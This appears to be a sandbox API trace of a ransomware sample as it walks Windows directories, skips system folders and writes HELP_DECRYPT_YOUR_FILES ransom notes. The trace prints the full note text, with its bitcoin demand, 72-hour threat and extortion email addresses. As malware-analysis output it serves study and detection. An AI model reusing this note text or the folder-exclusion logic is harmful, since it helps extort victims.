	[0167.280] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="boot") returned 0x0
	[0167.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.280] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="system volume information") returned 0x0
	[0167.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.280] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.280] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.281] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="temp") returned 0x0
	[0167.281] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.282] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="program files") returned 0x0
	[0167.282] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.282] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.282] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.282] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="appdata") returned 0x0
	[0167.282] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="application data") returned 0x0
	[0167.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="winnt") returned 0x0
	[0167.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.283] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="tmp") returned 0x0
	[0167.283] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="cache") returned 0x0
	[0167.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.284] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="webcache") returned 0x0
	[0167.284] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="inetcache") returned 0x0
	[0167.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="nvidia") returned 0x0
	[0167.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.285] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="packages") returned 0x0
	[0167.285] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="cookies") returned 0x0
	[0167.286] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.286] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\datamart\\paidwifi\\*.*", lpSrch="programdata") returned 0x0
	[0167.286] lstrcmpW (lpString1=".", lpString2="..") returned -1
	[0167.286] lstrcmpW (lpString1=".", lpString2=".") returned 0
	[0167.286] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d3b8412, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.286] lstrcmpW (lpString1="..", lpString2="..") returned 0
	[0167.286] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d3b8412, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d3b8412, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d3b8412, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x84b, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.HTML", cAlternateFileName="HELP_D~1.HTM")) returned 1
	[0167.286] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d392207, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d392207, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d3b8412, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 1
	[0167.287] FindNextFileW (in: hFindFile=0xfb98f0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d392207, ftCreationTime.dwHighDateTime=0x1d97afb, ftLastAccessTime.dwLowDateTime=0x7d392207, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x7d3b8412, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0xc76, dwReserved0=0x0, dwReserved1=0x0, cFileName="HELP_DECRYPT_YOUR_FILES.TXT", cAlternateFileName="HELP_D~1.TXT")) returned 0
	[0167.287] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 1
	[0167.287] FindClose (in: hFindFile=0xfb98f0 | out: hFindFile=0xfb98f0) returned 0
	[0167.287] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PaidWiFi", cAlternateFileName="")) returned 0
	[0167.288] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.288] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.288] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device Stage", cAlternateFileName="DEVICE~1")) returned 1
	[0167.288] lstrcmpW (lpString1="Device Stage", lpString2="..") returned 1
	[0167.288] lstrcmpW (lpString1="Device Stage", lpString2=".") returned 1
	[0167.289] lstrcpyW (in: lpString1=0x18c29c, lpString2="C:\\Users\\All Users\\Microsoft" | out: lpString1="C:\\Users\\All Users\\Microsoft") returned="C:\\Users\\All Users\\Microsoft"
	[0167.289] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\") returned="C:\\Users\\All Users\\Microsoft\\"
	[0167.289] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\", lpString2="Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage"
	[0167.289] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage"
	[0167.289] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\"
	[0167.289] lstrcpyW (in: lpString1=0x18b384, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\"
	[0167.289] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*"
	[0167.290] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0167.290] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned 45
	[0167.290] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.290] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\*.*") returned 0x2d
	[0167.290] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="windows") returned 0x0
	[0167.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="boot") returned 0x0
	[0167.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.291] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="system volume information") returned 0x0
	[0167.291] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0167.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="temp") returned 0x0
	[0167.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.292] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="program files") returned 0x0
	[0167.292] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="program files (x86)") returned 0x0
	[0167.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="appdata") returned 0x0
	[0167.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.293] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="application data") returned 0x0
	[0167.293] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="winnt") returned 0x0
	[0167.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="tmp") returned 0x0
	[0167.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.294] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="cache") returned 0x0
	[0167.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="temporary internet files") returned 0x0
	[0167.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="webcache") returned 0x0
	[0167.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.295] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="inetcache") returned 0x0
	[0167.295] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="nvidia") returned 0x0
	[0167.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="packages") returned 0x0
	[0167.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.296] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="cookies") returned 0x0
	[0167.296] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.306] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="programdata") returned 0x0
	[0167.306] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0167.306] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Device", cAlternateFileName="")) returned 1
	[0167.306] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 1
	[0167.306] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xcdfeea, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Task", cAlternateFileName="")) returned 0
	[0167.306] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0167.307] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0167.307] lstrcpyW (in: lpString1=0x18b794, lpString2="C:\\Users\\All Users\\Microsoft\\Device Stage" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage") returned="C:\\Users\\All Users\\Microsoft\\Device Stage"
	[0167.308] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*"
	[0167.308] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.308] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.308] wsprintfW (in: param_1=0x18b080, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.TXT") returned 69
	[0167.308] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.309] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0167.309] WriteFile (in: hFile=0x384, lpBuffer=0x18a438*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18b35c, lpOverlapped=0x0 | out: lpBuffer=0x18a438*, lpNumberOfBytesWritten=0x18b35c*=0xc46, lpOverlapped=0x0) returned 1
	[0167.313] CloseHandle (hObject=0x384) returned 1
	[0167.314] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a408*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.314] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.315] GetUserNameA (in: lpBuffer=0x18a2ec, pcbBuffer=0x18a404 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a404) returned 1
	[0167.316] wsprintfW (in: param_1=0x18b288, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0167.316] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\microsoft\\device stage\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.316] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0167.317] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0167.317] WriteFile (in: hFile=0x384, lpBuffer=0x18b288*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18b364, lpOverlapped=0x0 | out: lpBuffer=0x18b288*, lpNumberOfBytesWritten=0x18b364*=0x30, lpOverlapped=0x0) returned 1
	[0167.317] CloseHandle (hObject=0x384) returned 1
	[0167.318] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0167.318] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0167.318] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0167.319] wsprintfW (in: param_1=0x18b040, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.HTML") returned 70
	[0167.319] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.325] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0167.326] WriteFile (in: hFile=0x384, lpBuffer=0x18a834*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0x18a834*, lpNumberOfBytesWritten=0x18b358*=0x808, lpOverlapped=0x0) returned 1
	[0167.331] CloseHandle (hObject=0x384) returned 1
	[0167.331] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0167.332] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a81c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a81c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0167.332] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0167.332] GetUserNameA (in: lpBuffer=0x18a700, pcbBuffer=0x18a818 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a818) returned 1
	[0167.334] wsprintfA (in: param_1=0x18b248, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.334] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0167.334] SetFilePointer (in: hFile=0x384, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0167.334] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0167.334] WriteFile (in: hFile=0x384, lpBuffer=0x18b248*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18b360, lpOverlapped=0x0 | out: lpBuffer=0x18b248*, lpNumberOfBytesWritten=0x18b360*=0x43, lpOverlapped=0x0) returned 1
	[0167.335] CloseHandle (hObject=0x384) returned 1
	[0167.335] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*" (normalized: "c:\\users\\all users\\microsoft\\device stage\\*.*"), lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcdfeea, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xcdfeea, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x7d42abd7, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb98f0
	[0167.335] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*") returned 45
	[0167.335] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0167.336] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Device Stage\\*.*", cchLength=0x2d | out: lpsz="c:\\users\\all users\\microsoft\\device stage\\*.*") returned 0x2d
	[0167.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.336] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="windows") returned 0x0
	[0167.336] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="boot") returned 0x0
	[0167.337] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0167.337] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\device stage\\*.*", lpSrch="system volume information") returned 0x0
